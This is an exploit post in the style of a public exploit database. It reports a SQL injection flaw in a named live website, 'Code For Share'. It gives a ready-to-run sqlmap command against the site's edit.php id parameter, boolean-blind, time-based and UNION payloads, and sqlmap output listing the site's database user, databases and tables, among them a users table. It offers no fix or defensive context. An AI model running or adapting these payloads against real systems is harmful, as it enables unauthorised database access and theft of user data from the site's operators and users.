# Exploit Title: Code For Share | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://c4s.khacdatdo.dev/edit.php?id=33" --dbs --batch
---------------------------------------------------------------------------------------------------

Code For Share

https://c4s.khacdatdo.dev/edit.php?id=33

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=136 AND 3415=3415

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=136 AND (SELECT 2301 FROM (SELECT(SLEEP(5)))MWrG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=136 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x514a7842596c6b48737771584e474d756864455053446a54765843454d6b6b6441654351776e6965,0x717a6b6a71),NULL,NULL-- -
---

database management system users [1]:
[+] 'i4b3whw47kx5zgbc'@'%'

the back-end DBMS is MySQL
web application technology: PHP, Apache
back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[+] an1g279qniutsqwr
[+] information_schema

Database: an1g279qniutsqwr
[8 tables]
+---------------+
| discord-bot   |
| chatbot       |
| thcs2_code    |
| thcs2_log     |
| thcs2_report  |
| thcs2_txtcode |
| thcs2_users   |
| thcs2_view    |
+---------------+

Database: an1g279qniutsqwr
Table: thcs2_users
[8 entries]